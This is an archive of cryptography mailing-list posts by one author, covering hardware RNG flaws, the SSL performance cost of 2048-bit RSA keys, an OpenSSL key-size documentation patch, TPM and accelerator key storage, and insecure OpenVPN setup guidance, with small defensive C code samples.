Re: [Cryptography] Radioactive random numbers

2013-09-13 Thread Thor Lancelot Simon
On Thu, Sep 12, 2013 at 11:00:47AM -0400, Perry E. Metzger wrote:
 
 In addition to getting CPU makers to always include such things,
 however, a second vital problem is how to gain trust that such RNGs
 are good -- both that a particular unit isn't subject to a hardware
 defect and that the design wasn't sabotaged. That's harder to do.

Or that a design that wasn't sabotaged intentionally wasn't sabotaged
accidentally while being dropped into place in a slightly different
product.  I've always thought highly of the design of the Hifn RNG
block, and the outside analysis of it which they published, but years
ago at Reefedge we found a bug in its integration into a popular Hifn
crypto processor that evidently had slipped through the cracks -- I
discussed it in more detail last year at
http://permalink.gmane.org/gmane.comp.security.cryptography.randombit/3020 .
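
By way of illustration, here is a minimal sketch in C of the kind of
check that catches this class of integration bug -- a FIPS 140-2 style
continuous test, where every block read from the hardware is compared
against the previous one, so a register that is wired up wrong and
returns constant or stale data fails on the first repeated block.  This
is not the Hifn driver's actual code, and read_hwrng() is a hypothetical
accessor for the device's RNG output register:

#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define RNG_BLOCK 8   /* bytes per read of the RNG output register */

/* Hypothetical accessor; returns 0 on success. */
extern int read_hwrng(uint8_t buf[RNG_BLOCK]);

bool rng_read_checked(uint8_t out[RNG_BLOCK])
{
    static uint8_t prev[RNG_BLOCK];
    static bool primed = false;

    if (read_hwrng(out) != 0)
        return false;                   /* device error */
    if (primed && memcmp(prev, out, RNG_BLOCK) == 0)
        return false;                   /* stuck output: refuse to use it */
    memcpy(prev, out, RNG_BLOCK);
    primed = true;
    return true;
}

A test like this costs one memcmp per read and would have flagged the
misintegrated part the first time anyone actually exercised it.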

Thor


Re: [Cryptography] Washington Post: Google racing to encrypt links between data centers

2013-09-07 Thread Thor Lancelot Simon
On Fri, Sep 06, 2013 at 07:53:42PM -0400, Marcus D. Leech wrote:

 One wonders why they weren't already using link encryption systems?

One wonders whether, if what we read around here lately is any guide,
they still believe they can get link encryption systems that are
robust against the only adversary likely to be attacking their North
American links?

Thor


Re: Formal notice given of rearrangement of deck chairs on RMS PKItanic

2010-10-06 Thread Thor Lancelot Simon
On Wed, Oct 06, 2010 at 01:32:00PM -0500, Matt Crawford wrote:

 That is, if your CA key size is smaller, stop signing with it.

You may have missed the next sentence of Mozilla's statement:

 All CAs should stop issuing intermediate and end-entity certificates with
 RSA key size smaller than 2048 bits under any root.

That is, no matter how long your root key is (the previous sentence
stated the requirements about _that_) you may not use it to sign any
end-entity certificate whose key size is < 2048 bits.

Gun: check.
Bullets: check.
Feet: check.

Now they have everything they need to prevent HTTPS Everywhere.

Thor



Re: 2048 bits, damn the electrons! [...@openssl.org: [openssl.org #2354] [PATCH] Increase Default RSA Key Size to 2048-bits]

2010-09-30 Thread Thor Lancelot Simon
On Wed, Sep 29, 2010 at 09:22:38PM -0700, Chris Palmer wrote:
 Thor Lancelot Simon writes:
 
  a significant net loss of security, since the huge increase in computation
  required will delay or prevent the deployment of SSL everywhere.
 
 That would only happen if we (as security experts) allowed web developers to
 believe that the speed of RSA is the limiting factor for web application
 performance.

At 1024 bits, it is not.  But you are looking at a factor of *9* increase
in computational cost when you go immediately to 2048 bits.  At that point,
the bottleneck for many applications shifts, particularly those which are
served by offload engines specifically to move the bottleneck so it's not
RSA in the first place.
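
For anyone who wants to reproduce the factor: a rough micro-benchmark
sketch of my own (not anyone's production code) against the old,
era-appropriate OpenSSL RSA API, built with something like
"cc bench.c -lcrypto".  The exact ratio varies by CPU and library
version; figures posted in these threads ran from about 7x to 11x.

#include <stdio.h>
#include <time.h>
#include <openssl/objects.h>
#include <openssl/rsa.h>

static double signs_per_sec(RSA *rsa)
{
    unsigned char digest[20] = { 0 };   /* stand-in SHA-1 digest */
    unsigned char sig[512];
    unsigned int siglen;
    int i, iters = 500;
    clock_t t0 = clock();

    for (i = 0; i < iters; i++)
        RSA_sign(NID_sha1, digest, sizeof(digest), sig, &siglen, rsa);
    return iters / ((double)(clock() - t0) / CLOCKS_PER_SEC);
}

int main(void)
{
    int bits[] = { 1024, 2048 }, i;

    for (i = 0; i < 2; i++) {
        /* deprecated in later OpenSSL, but standard in this era */
        RSA *rsa = RSA_generate_key(bits[i], 65537, NULL, NULL);
        printf("RSA-%d: %.0f private-key ops/sec\n",
               bits[i], signs_per_sec(rsa));
        RSA_free(rsa);
    }
    return 0;
}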

Also, consider devices such as deep-inspection firewalls or application
traffic managers which must by their nature offload SSL processing in
order to inspect and possibly modify data before application servers see 
it.  The inspection or modification function often does not parallelize
nearly as well as the web application logic itself, and so it is often
not practical to handle it in a distributed way and just add more CPU.

At present, these devices use the highest performance modular-math ASICs
available and can just about keep up with current web applications'
transaction rates.  Make the modular math an order of magnitude slower
and suddenly you will find you can't put these devices in front of some
applications at all.

This too will hinder the deployment of SSL everywhere, and handwaving
about how for some particular application, the bottleneck won't be at
the front-end server even if it is an order of magnitude slower for it
to do the RSA operation itself will not make that problem go away.

Thor



Re: 2048 bits, damn the electrons! [...@openssl.org: [openssl.org #2354] [PATCH] Increase Default RSA Key Size to 2048-bits]

2010-09-30 Thread Thor Lancelot Simon
On Thu, Sep 30, 2010 at 01:36:47PM -0400, Paul Wouters wrote:
[I wrote]:
 Also, consider devices such as deep-inspection firewalls or application
 traffic managers which must by their nature offload SSL processing in
 order to inspect and possibly modify data

 You mean it will be harder for MITM attacks on SSL. Isn't that a good thing? 
 :P

No, I don't mean that, because if the administrator of site _X_ decides
to do SSL processing on a front-end device instead of on the HTTP servers,
for whatever reason, that is simply not a MITM attack.

To characterize it as one is basically obfuscatory.

When I talk about SSL everywhere being an immediate opportunity, I mean
that, from my point of view, it looks like there's a growing realization
that _for current key sizes and server workloads_, for many high transaction
rate sites like Gmail, using SSL is basically free -- so you might as well,
and we all end up better off.

Multiplying the cost of the SSL session negotiation by a small factor will
change that for a few sites, but multiplying it by a factor somewhere from
8 to 11 (depending on different measurements posted here in previous
discussions) will change it for a lot more.

That's very unfortunate, from my point of view, because I believe it is
a much greater net good to have most or almost all HTTP traffic encrypted
than it is for individual websites to have keys that expire in 3 years,
but are resistant to factoring for 20 years.

The balance is just plain different for end keys and CA keys.  A
one-size-fits-all approach using the key length appropriate for the CA
will hinder universal deployment of SSL/TLS at the end sites.  That is
not a good thing.

Thor



2048 bits, damn the electrons! [...@openssl.org: [openssl.org #2354] [PATCH] Increase Default RSA Key Size to 2048-bits]

2010-09-29 Thread Thor Lancelot Simon
Index: doc/apps/req.pod
===
RCS file: /v/openssl/cvs/openssl/doc/apps/req.pod,v
retrieving revision 1.21
diff -U 5 -r1.21 req.pod
--- doc/apps/req.pod	15 Apr 2009 15:26:56 -0000	1.21
+++ doc/apps/req.pod	28 Sep 2010 14:44:44 -0000
@@ -347,11 +347,11 @@
 configuration file values.
 
=item B<default_bits>
 
 This specifies the default key size in bits. If not specified then
-512 is used. It is used if the B<-new> option is used. It can be
+2048 is used. It is used if the B<-new> option is used. It can be
 overridden by using the B<-newkey> option.
 
=item B<default_keyfile>
 
 This is the default filename to write a private key to. If not
@@ -504,20 +504,20 @@
 
  openssl req -in req.pem -text -verify -noout
 
 Create a private key and then generate a certificate request from it:
 
- openssl genrsa -out key.pem 1024
+ openssl genrsa -out key.pem 2048
  openssl req -new -key key.pem -out req.pem
 
 The same but just using req:
 
- openssl req -newkey rsa:1024 -keyout key.pem -out req.pem
+ openssl req -newkey rsa:2048 -keyout key.pem -out req.pem
 
 Generate a self signed root certificate:
 
- openssl req -x509 -newkey rsa:1024 -keyout key.pem -out req.pem
+ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out req.pem
 
 Example of a file pointed to by the B<oid_file> option:
 
  1.2.3.4   shortName   A longer Name
  1.2.3.6   otherName   Other longer Name
@@ -529,11 +529,11 @@
  testoid2=${testoid1}.6
 
 Sample configuration file prompting for field values:
 
  [ req ]
- default_bits  = 1024
+ default_bits  = 2048
  default_keyfile   = privkey.pem
  distinguished_name= req_distinguished_name
  attributes= req_attributes
  x509_extensions   = v3_ca
 
@@ -570,11 +570,11 @@
 
 
  RANDFILE  = $ENV::HOME/.rnd
 
  [ req ]
- default_bits  = 1024
+ default_bits  = 2048
  default_keyfile   = keyfile.pem
  distinguished_name= req_distinguished_name
  attributes= req_attributes
  prompt= no
  output_password   = mypass
Index: doc/crypto/EVP_PKEY_CTX_ctrl.pod
===
RCS file: /v/openssl/cvs/openssl/doc/crypto/EVP_PKEY_CTX_ctrl.pod,v
retrieving revision 1.3
diff -U 5 -r1.3 EVP_PKEY_CTX_ctrl.pod
--- doc/crypto/EVP_PKEY_CTX_ctrl.pod	30 Sep 2009 23:42:56 -0000	1.3
+++ doc/crypto/EVP_PKEY_CTX_ctrl.pod	28 Sep 2010 14:44:44 -0000
@@ -80,12 +80,12 @@
 signing -2 sets the salt length to the maximum permissible value. When
 verifying -2 causes the salt length to be automatically determined based on the
 B<PSS> block structure. If this macro is not called a salt length value of -2
 is used by default.
 
-The EVP_PKEY_CTX_set_rsa_rsa_keygen_bits() macro sets the RSA key length for
-RSA key genration to B<bits>. If not specified 1024 bits is used.
+The EVP_PKEY_CTX_set_rsa_keygen_bits() macro sets the RSA key length for RSA key
+generation to B<bits>. If not specified 2048 bits is used.
 
 The EVP_PKEY_CTX_set_rsa_keygen_pubexp() macro sets the public exponent value
 for RSA key generation to B<pubexp> currently it should be an odd integer. The
 B<pubexp> pointer is used internally by this function so it should not be
 modified or free after the call. If this macro is not called then 65537 is 
used.
Index: doc/crypto/RSA_generate_key.pod
===
RCS file: /v/openssl/cvs/openssl/doc/crypto/RSA_generate_key.pod,v
retrieving revision 1.6
diff -U 5 -r1.6 RSA_generate_key.pod
--- doc/crypto/RSA_generate_key.pod	25 Sep 2002 13:33:27 -0000	1.6
+++ doc/crypto/RSA_generate_key.pod	28 Sep 2010 14:44:44 -0000
@@ -16,11 +16,11 @@
 RSA_generate_key() generates a key pair and returns it in a newly
 allocated B<RSA> structure. The pseudo-random number generator must
 be seeded prior to calling RSA_generate_key().
 
 The modulus size will be B<num> bits, and the public exponent will be
-B<e>. Key sizes with B<num> E<lt> 1024 should be considered insecure.
+B<e>. Key sizes with B<num> E<lt> 2048 should be considered insecure.
 The exponent is an odd number, typically 3, 17 or 65537.
 
 A callback function may be used to provide feedback about the
 progress of the key generation. If B<callback> is not B<NULL>, it
 will be called as follows:


- End forwarded message -

-- 
Thor Lancelot Simon                                    t...@rek.tjls.com
  "All of my opinions are consistent, but I cannot present them all
   at once." -Jean-Jacques Rousseau, On The Social Contract


Re: Folly of looking at CA cert lifetimes

2010-09-14 Thread Thor Lancelot Simon
On Tue, Sep 14, 2010 at 08:14:59AM -0700, Paul Hoffman wrote:
 At 10:57 AM -0400 9/14/10, Perry E. Metzger did not write, but passed on for 
 someone else:
 This suggests to me that even if NIST is correct that 2048 bit RSA
 keys are the reasonable the minimum for new deployments after 2010,
 much shorter keys are appropriate for most server certificates that
 these CAs will sign.  The CA keys have lifetimes of 10 years or more;
 the server keys a quarter to a fifth of that.
 
 No, no, a hundred times no. (Well, about 250 times, or however many
 CAs are in the current OS trust anchor piles.) The lifetime of a CA
 key is exactly as long as the OS or browser vendor keeps that key,
 usually in cert form, in its trust anchor pile. You should not
 extrapolate *anything* from the contents of the CA cert except the key
 itself and the proclaimed name associated with it.

I don't understand.  The original text seems to be talking about *server*
certificate lifetimes, and how much shorter they are than CA cert
lifetimes.  What does that have to do with a thousand times no about
some proposition to do with CA cert lifetimes?

In other words, if CA key lifetimes are longer than indicated by their
X.509 properties, it seems to me that just makes the quoted text about
the relationship between server and CA key lifetimes even more true.

Thor



Re: questions about RNGs and FIPS 140

2010-08-27 Thread Thor Lancelot Simon
On Fri, Aug 27, 2010 at 07:20:06PM +1200, Peter Gutmann wrote:
 
 No.  If you choose your eval lab carefully you can sneak in a TRNG somewhere
 as input to your PRNG, but you can't get a TRNG certified, and if you're
 unlucky you won't be allowed to use a TRNG at all.

I am surprised you'd have trouble with this at any lab.  Isn't there
specific guidance on this in the DTRs?  My 10-years-rusty recollection
is that, specifically, the input used to key the Approved RNG may not
contain provably less entropy than the Approved RNG's output, or words
very close to that in effect.

Thor



Re: Has there been a change in US banking regulations recently?

2010-08-14 Thread Thor Lancelot Simon
On Fri, Aug 13, 2010 at 02:55:32PM -0500, eric.lengve...@wellsfargo.com wrote:
 
 The big drawback is that those who want to follow NIST's
 recommendations to migrate to 2048-bit keys will be returning to
 the 2005-era overhead. Dan Kaminsky provided some benchmarks in a
 different thread on this list [1] that showed 2048-bit keys performing
 at 1/9th of 1024-bit. My own internal benchmarks have been closer to
 1/7th to 1/8th. Either way, that's back in line with the above stated
 90-95% overhead. Meaning, in Dan's words, "2048 ain't happening."

Indeed.  The way forward would seem to be ECC, but show me a load balancer
or even a dedicated SSL offload device which supports ECC.  I'm not even
certain the popular clients, which are usually well ahead of everything
else in terms of cryptography support, can cope with it.  The only place
it seems to be consistently used is in proprietary client/server software
for mobile devices, as has been the case for years.

Thor



Re: A mighty fortress is our PKI, Part II

2010-08-11 Thread Thor Lancelot Simon
On Wed, Aug 04, 2010 at 10:46:44PM -0700, Jon Callas wrote:
 
 I think you'll have to agree that unlike history, which starts out as
 tragedy and replays itself as farce, PKI has always been farce over the
 centuries. It might actually end up as tragedy, but so far so good. I'm
 sure that if we look further, the Athenians had the same issues with it
 that we do today, and that Sophocles had his own farcical commentary.

If you want to see a PKI tragedy in the making, have a look at the CRLs
used by the US DoD.

Thor



Re: Intel to also add RNG

2010-07-14 Thread Thor Lancelot Simon
On Tue, Jul 13, 2010 at 05:46:36PM +1200, Peter Gutmann wrote:
 Paul Wouters p...@xelerance.com writes:
 
 Which is what you should do anyway, in case of a hardware failure.  I
 know the Linux intel-rng and amd-rng used to produce nice series of zeros.
 
 Do you have any more details on this?  Was it a hardware problem, software
 problem, ...?  How was it caught?

I couldn't say, as regards AMD's chipset RNG.  Intel's, however, was on
an optional component of one of their motherboard chipsets.  Many
motherboard vendors chose to buy that component from other sources, who
implemented something register-compatible to the Intel part but with
the RNG register not actually connected to a random number source.

Worse, when Intel increased chipset integration and pulled the optional
chip into one of the host bridge chips, they did the exact same thing.

The basic problem was that the register indicating presence-of-RNG was
not on the same piece of silicon (originally) as the actual RNG.  So the
register really indicated only that this Intel chipset *was capable of
interfacing to the chip with the RNG on it*; nothing more.

Worse, a lot of people read noise -- but not really random noise --
from those notional RNG registers and persuaded themselves that since
the output wasn't constant, there must really be an RNG present.
Oops.
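
For what it's worth, here is roughly the check people were effectively
running by eye -- a crude monobit-style test, sketched in C.  Passing it
is close to meaningless: any whitened deterministic source (a hashed
counter, an LFSR) passes just as easily, which is exactly how those
notional RNG registers fooled people.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Fraction of one-bits should sit near 1/2 for plausibly random data.
 * Necessary, but nowhere near sufficient: this says nothing about
 * whether a real entropy source is behind the register. */
bool monobit_plausible(const uint8_t *buf, size_t len)
{
    size_t i, ones = 0, total = len * 8, diff;

    for (i = 0; i < len; i++) {
        uint8_t b = buf[i];
        while (b) {
            ones += b & 1;
            b >>= 1;
        }
    }
    /* crude 1% tolerance band around a 50% ones-density */
    diff = (2 * ones > total) ? 2 * ones - total : total - 2 * ones;
    return diff < total / 100;
}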

Thor



Re: SHA-1 and Git (was Re: [tahoe-dev] Tahoe-LAFS key management, part 2: Tahoe-LAFS is like encrypted git)

2009-08-25 Thread Thor Lancelot Simon
On Tue, Aug 25, 2009 at 12:44:57PM +0100, Ben Laurie wrote:
 Perry E. Metzger wrote:
  Yet another reason why you always should make the crypto algorithms you
  use pluggable in any system -- you *will* have to replace them some day.
 
 In order to roll out a new crypto algorithm, you have to roll out new
 software. So, why is anything needed for pluggability beyond versioning?
 
 It seems to me protocol designers get all excited about this because
 they want to design the protocol once and be done with it. But software
 authors are generally content to worry about the new algorithm when they
 need to switch to it - and since they're going to have to update their
 software anyway and get everyone to install the new version, why should
 they worry any sooner?

Look at the difference between the time it requires to add an algorithm
to OpenSSL and the time it requires to add a new SSL or TLS version to
OpenSSL.  Or should we expect TLS 1.2 support any day now?  If earlier
TLS versions had been designed to allow the hash functions in the PRF
to be swapped out, the exercise of recovering from new horrible problems
with SHA1 would be vastly simpler, easier, and far quicker.  It is just
not the case that the software development exercise of implementing a
new protocol is on a scale with that of implementing a new cipher or hash
function -- it is far, far larger, and that, alone, seems to me to be
sufficient reason to design protocols so that algorithms and algorithm
parameter sizes are not fixed.
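
At the implementation level, designing for that kind of agility can be
as mundane as dispatching through a table keyed by a negotiated
algorithm ID -- an illustrative sketch only, not TLS's or OpenSSL's
actual internals -- so that retiring a broken hash is a table entry and
an ID bump rather than a new protocol engine:

#include <stddef.h>
#include <stdint.h>
#include <openssl/sha.h>

typedef struct {
    uint16_t id;                       /* value negotiated on the wire */
    size_t   digest_len;
    void   (*digest)(const unsigned char *, size_t, unsigned char *);
} hash_alg;

static void do_sha1(const unsigned char *d, size_t n, unsigned char *md)
{ SHA1(d, n, md); }
static void do_sha256(const unsigned char *d, size_t n, unsigned char *md)
{ SHA256(d, n, md); }

static const hash_alg algs[] = {
    { 1, SHA_DIGEST_LENGTH,    do_sha1   },
    { 2, SHA256_DIGEST_LENGTH, do_sha256 },  /* added without protocol surgery */
};

const hash_alg *lookup_alg(uint16_t id)
{
    size_t i;
    for (i = 0; i < sizeof(algs) / sizeof(algs[0]); i++)
        if (algs[i].id == id)
            return &algs[i];
    return NULL;   /* unknown algorithm: refuse, or negotiate another */
}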

Thor



bcm586x has onboard key storage

2009-05-08 Thread Thor Lancelot Simon
I don't have any details of how it works (and I don't know how hard
it would be to get Broadcom to cough them up -- they seem better about
this lately than they used to be) but looking at the bcm586x product
announcement, I see they added onboard key storage.

-- 
Thor Lancelot Simon                                    t...@rek.tjls.com
"Even experienced UNIX users occasionally enter rm *.* at the UNIX
 prompt only to realize too late that they have removed the wrong
 segment of the directory structure." - Microsoft WSS whitepaper



Re: full-disk subversion standards released

2009-04-30 Thread Thor Lancelot Simon
On Sat, Mar 07, 2009 at 05:40:31AM +1300, Peter Gutmann wrote:

 Given that, when I looked a couple of years ago, TPM support for
 public/private-key stuff was rather hit-and-miss and in some cases seemed to
 be entirely absent (so you could use the TPM to wrap and unwrap stored private
 keys

But this, itself, is valuable.  Given trivial support in the operating system
kernel, it eliminates one of the most common key-theft attack vectors
against webservers.

I must admit I'm curious whether the TPM vendors are licensing the relevant
IBM patent on what amounts to any wrapping of cryptographic keys using
encryption - I can only assume they are.

Thor



Re: full-disk subversion standards released

2009-04-30 Thread Thor Lancelot Simon
On Sat, Mar 07, 2009 at 07:36:25AM +1300, Peter Gutmann wrote:
 
 In any case though, how big a deal is private-key theft from web servers?
 What examples of real-world attacks are there where an attacker stole a
 private key file from a web server, brute-forced the password for it, and then
 did... well, what with it?  I don't mean what you could in theory do with it,
 I mean which currently-being-exploited attack vector is this helping with?

Almost no web servers run with passwords on their private key files.
Believe me.  I build server load balancers for a living and I see a _lot_
of customer web servers -- this is how it is.

 This does seem like rather a halfway point to be in though, if you're not
 worried about private-key theft from the server then do it in software, and if
 you are then do the whole thing in hardware (there's quite a bit of this
 around for SSL offload)

No, no there's not.  In fact, I solicited information here about crypto
accelerators with onboard persistent key memory (secure key storage)
about two years ago and got basically no responses except pointers to
the same old, discontinued or obsolete products I was trying to replace.

-- 
Thor Lancelot Simon                                    t...@rek.tjls.com
"Even experienced UNIX users occasionally enter rm *.* at the UNIX
 prompt only to realize too late that they have removed the wrong
 segment of the directory structure." - Microsoft WSS whitepaper



Re: full-disk subversion standards released

2009-04-30 Thread Thor Lancelot Simon
On Sun, Mar 15, 2009 at 12:26:39AM +1300, Peter Gutmann wrote:
 
 I was hoping someone else would leap in about now and question this, but I
 guess I'll have to do it... maybe we have a different definition of what's
 required here, but AFAIK there's an awful lot of this kind of hardware
 floating around out there, admittedly it's all built around older crypto
 devices like Broadcom 582x's and Cavium's Nitrox (because there hasn't been
 any real need to come up with replacements) but I didn't think there'd be much
 problem with finding the necessary hardware, unless you've got some particular
 requirement that rules a lot of it out.

Nitrox doesn't have onboard key memory.  Cavium's FIPS140 certified
Nitrox board-level solutions include a smartcard and a bunch of
additional hardware and software which implement (among other things)
secure key storage -- but these are a world apart from the run of the
mill Nitrox parts one finds embedded in all kinds of commonplace
devices.  They also provide an API which is tailored for FIPS140 compliance:
good if you need it, far from ideal for the common case for web servers, and
very different from the standard set of tools one gets for the bare Nitrox
platform.

There are of course similar board-level solutions using BCM582x as the
crypto core.  But in terms of cost and complexity I might as well just
use custom hardware -- I'd probably come out ahead.  And you can't just
_ignore_ performance, nor new algorithms, so eventually using very old
crypto cores makes the whole thing fail to fly.  (If moderate
performance will suffice, I note that NBMK Encryption will still sell
you the old NetOctave NSP2000, which is a pretty nice design that has
onboard key storage but lacks AES, larger SHA variants, and other modern
features).

To the extent of my knowledge there are currently _no_ generally
available, general-purpose crypto accelerator chip-level products with
onboard key storage or key wrapping support, with the exception of parts
first sold more than 5 years ago and being shipped now from old stock.

This was once a somewhat common feature on accelerators targeted at
the SSL/IPsec market.  That appears to no longer be the case.

-- 
Thor Lancelot Simon                                    t...@rek.tjls.com
"Even experienced UNIX users occasionally enter rm *.* at the UNIX
 prompt only to realize too late that they have removed the wrong
 segment of the directory structure." - Microsoft WSS whitepaper



Re: full-disk subversion standards released

2009-01-31 Thread Thor Lancelot Simon
On Fri, Jan 30, 2009 at 04:08:07PM -0800, John Gilmore wrote:
 
 The theory that we should build good and useful tools capable of
 monopoly and totalitarianism, but use social mechanisms to prevent
 them from being used for that purpose, strikes me as naive.

Okay.  In that case, please, explain to me why you are not opposed
to the manufacture and sale of digital computers.

More gently: it seems to me that there is an "only" missing from your
sentence above, or else it is almost by necessity a straw-man argument:
it will, if consistently applied as you have stated it, hold against
various tools I do not believe you actually oppose the manufacture or
sale of, such as printing presses, guns, and door locks.

Many of TCG's documents purport to specify mechanisms that are in fact
generally useful for beneficial purposes, such as boot-time validation
of software environments, secure storage of cryptographic keys, or
low-bandwidth generation of good random numbers.

Do you actually mean that such things should not be built, or only that
you are suspicious of TCG's intent in building them?

In text I've snipped, you claimed to describe TCG's charter.  I must
admit that I don't know if they even actually have such a document.
But, on the other hand, they describe their own purpose like this
(these are their actual words):

The Trusted Computing Group (TCG) is a not-for-profit organization formed to
develop, define, and promote open standards for hardware-enabled trusted
computing and security technologies, including hardware building blocks and
software interfaces, across multiple platforms, peripherals, and devices. TCG
specifications will enable more secure computing environments without
compromising functional integrity, privacy, or individual rights. The primary
goal is to help users protect their information assets (data, passwords, keys,
etc.) from compromise due to external software attack and physical theft.

I happen to think that if those _stated_ goals were achieved, that would
be a good thing, and that there are in fact hardware and software mechanisms
that could help achieve them -- some of which TCG has made stabs at
specifying, though they've generally missed the mark.

Leaving aside your assertions about TCG's _actual_ goals -- which may be
correct -- are you really of the position that what's described above,
no matter who were to build it nor how well, would be only useful for
monopoly and totalitarianism?

Thor



Re: full-disk subversion standards released

2009-01-30 Thread Thor Lancelot Simon
On Thu, Jan 29, 2009 at 01:22:37PM -0800, John Gilmore wrote:

 If it comes from the Trusted Computing Group, you can pretty much
 assume that it will make your computer *less* trustworthy.  Their idea
 of a trusted computer is one that random unrelated third parties can
 trust to subvert the will of the computer's owner.

People have funny notions of ownership, don't they?

It's very clear to me that I don't own my desktop machine at my office;
my employer does.  But even if TCG were to punch out a useful, reasonable
standard (which I do not think they have done in any case so far), there
remains the policy problem of how to ensure that my desktop machine's
actual owner can enforce its ownership of that machine against me, while
the retailer who sold me my desktop machine at home -- which I do own --
or for that matter the U.S. Government, can't enforce _its_ ownership of
my own machine against me.  That's a real problem, and solutions to it
are useful.

Given such solutions, frameworks like what TCG is chartered to build are
in fact good and useful.  I don't think it's right to blame the tool (or
the implementation details of a particular instance of a particular kind
of tool) for the idiot carpenter.

Thor



Re: Obama's secure PDA

2009-01-26 Thread Thor Lancelot Simon
On Mon, Jan 26, 2009 at 02:49:31AM -0500, Ivan Krstić wrote:

 Finally, any idea why the Sectéra is certified up to Top Secret for
 voice but only up to Secret for e-mail? (That is, what are the differing 
 requirements?)

I know no specific details but strongly suspect the difference in
requirements, and thus certifications, stems from the likelihood that
the device stores (even very briefly) email and cached web objects, but
does not store voice communications.

Thor



Re: Lava lamp random number generator made useful?

2008-09-22 Thread Thor Lancelot Simon
On Sun, Sep 21, 2008 at 01:20:22PM -0400, James Cloos wrote:
  IanG == IanG  [EMAIL PROTECTED] writes:
 
 IanG Nope, sorry, didn't follow it.  What is BOM, SoC, A plug, gerber?
 
 Bill Of Materials  -- cost of the raw hardware
 System on (a) Chip -- microchip with CPU, RAM, FLASH, etc
 USB A Plug -- physical flat-four interface; think USB key drive
 gerber -- file format for hardware designs
 
 A system-on-a-chip which has rng and usb-client hardware on board (aka
 on chip) should fit in a package which looks just like a USB key drive.

I looked into this at moderate length about two years ago.  One very
attractive choice was the cheapest Motorola Coldfire with their onboard
crypto block, because you get the hashing for free and don't waste host
resources transferring in data you'll then distill by hash -- or hashing
it.

As a source of random numbers, I was figuring to use one of the publicly
available thermal noise designs plus the cheapest HiFn PCI crypto chip
(which features a multi-oscillator RNG I'm reasonably familiar with) since
the Coldfire with crypto has both USB and PCI on it.

Thor



Re: Mifare

2008-07-14 Thread Thor Lancelot Simon
On Sun, Jul 13, 2008 at 02:41:29PM +1000, James A. Donald wrote:
 
 Now everyone is going to say it should have been put out for review, and 
 of course it should have been, and had they done so they would have 
 avoided these particular mistakes, but DNSSEC and WPA was reviewed to 
 hell and back, and the result was still no damned good.

Really?  From a cryptographic -- not a political -- point of view, what
exactly is wrong with DNSSEC or WPA?

WPA certainly seems to be quite widely deployed.

-- 
Thor Lancelot Simon                                    [EMAIL PROTECTED]
 "My guess is that the minimal training typically provided would only
  have given the party in question multiple new and elaborate ways to do
  something incomprehensibly stupid and dangerous."  -Rich Goldstone



Re: User interface, security, and simplicity

2008-05-04 Thread Thor Lancelot Simon
On Sat, May 03, 2008 at 07:50:01PM -0400, Perry E. Metzger wrote:
 
 Steven M. Bellovin [EMAIL PROTECTED] writes:
  There's a technical/philosophical issue lurking here.  We tried to
  solve it in IPsec; not only do I think we didn't succeed, I'm not at
  all clear we could or should have succeeded.
 
  IPsec operates at layer 3, where there are (generally) no user
  contexts.  This makes it difficult to bind IPsec credentials to a user,
  which means that it inherently can't be as simple to configure as ssh.
 
 I disagree. Fundamentally, OpenVPN isn't doing anything IPSEC couldn't
 do, and yet is is fairly easy to configure.

And yet there's no underlying technical reason why it is any easier to
configure than IPsec is; it is all a matter of the configuration interface
provided by your chosen SSL VPN (in this case, OpenVPN) or IPsec
implementation.

I find it amusing (but somewhat sad) that in fact one can find basically
the same set of flaws in each, but they're considered damning in IPsec
while they're handwaved away or overlooked in SSL VPNs.  Of course you
(Perry) or I can configure either IPsec or OpenVPN in a safe and sane way;
and, of course, there are some VPN packages of either type (IPsec or SSL
VPN) which have configuration interfaces so bad that we _couldn't_, in
fact, set them up safely -- because they prevent safe, sane configuration.

The problem is that whether you or I _can_ set software X up safely isn't
the question that matters.  The question that matters is _will_ a naive
user who does not understand the underlying security questions set software
X up securely.

And, in fact, most VPN software of any type fails this test.  My concern
is that an excessive focus on "how hard is it to set this thing up?" can
seriously obscure the important second half of the question: "and if you
set it up in the easiest possible way, is it safe?"

Thor



User interface, security, and simplicity

2008-05-01 Thread Thor Lancelot Simon
It's fashionable in some circles (including, it seems, this one) to bash
IPsec (particularly IKE) and tout SSL VPNs (particularly OpenVPN) on what
are basically user interface grounds.

I cannot help repeatedly noting that -- I believe more so than with actual
IPsec deployments, whether with or without IKE -- OpenVPN deployments are
often configured in hideously insecure ways.  This is no more the fault of
OpenVPN's designers, of course, than the ghastly configuration interfaces
imposed by many IKE implementations are the fault of IPsec's designers.

See, for example, http://doc.pfsense.org/index.php/VPN_Capability_OpenVPN
which is the official documentation from the popular pfsense
firewall/NAT/VPN package on configuring OpenVPN for use with clients.  Of
particular note:

1) It is not possible to configure a list of expected identities
   of users; rather, just a CA which must sign for all users.

2) No CRL is configured, nor do the instructions say to do so,
   though it is possible.

3) The client and server certificates come from the same CA,
   and both client and server get configured with *only the CA
   certificate*, not the subject name of the expected peer.

This is, of course, a serious security hole all of its
own, since it allows any client to conduct an MITM 
attack and impersonate the server.

4) Instructions are given for using a package called EasyRSA
   to set up a CA and create and sign keys.  These instructions
   have several severe flaws of their own:

a) They generate client public and private keys *on the
   CA* rather than using client generation and proper
   certificate signing requests.  This poses a needless
   risk of private key compromise, which is, in fact,
   particularly likely, since

b) The instructions mention only in passing that oh, by
   the way, one might want to encrypt the client's new
   private key, and that one _could_ do so -- but the
   example does not, in fact, encrypt the key.
   Anecdotally I have heard of a few users of this
   combination of software packages (OpenVPN/pfsense/
   EasyRSA) who bother to encrypt the private keys
   they send to users -- but quite a few more who just
   ship them around plaintext, since the example does
   so.

c) No documentation at all is given of how to revoke a
   key, nor why one would want to do so.

5) No explanation whatsoever is given of the compromises made in
   the process of simplifying the configuration of this VPN
   software -- which are significant and have major security
   consequences.

The upshot is that, indeed, at least as shown here, this particular
configuration frontend to OpenVPN is very easy to configure -- if you
are willing to settle for much less security than OpenVPN was designed
to provide, and much less than, if you're naive about cryptography, you
probably think you're getting.

Gee, that's funny, that's one of the problems with IPsec implementations
that people always cite when they tout SSL VPNs (the other is that some
firewalls can't be configured to pass IP protocol 50 for ESP -- but, of
course, ESP can be tunneled in UDP, in a standard way, and that's been
true for years now).

I am left with the strong suspicion that SSL VPNs are easier to configure
and use because a large percentage of their user population simply is not
very sensitive to how much security is actually provided.  Someone said
"have a firewall," they set up a firewall.  Someone says "I can't get in
through the firewall, set up a VPN," they set up a VPN.  For their purposes
IP over DNS might serve just as well -- and if enough other people said it
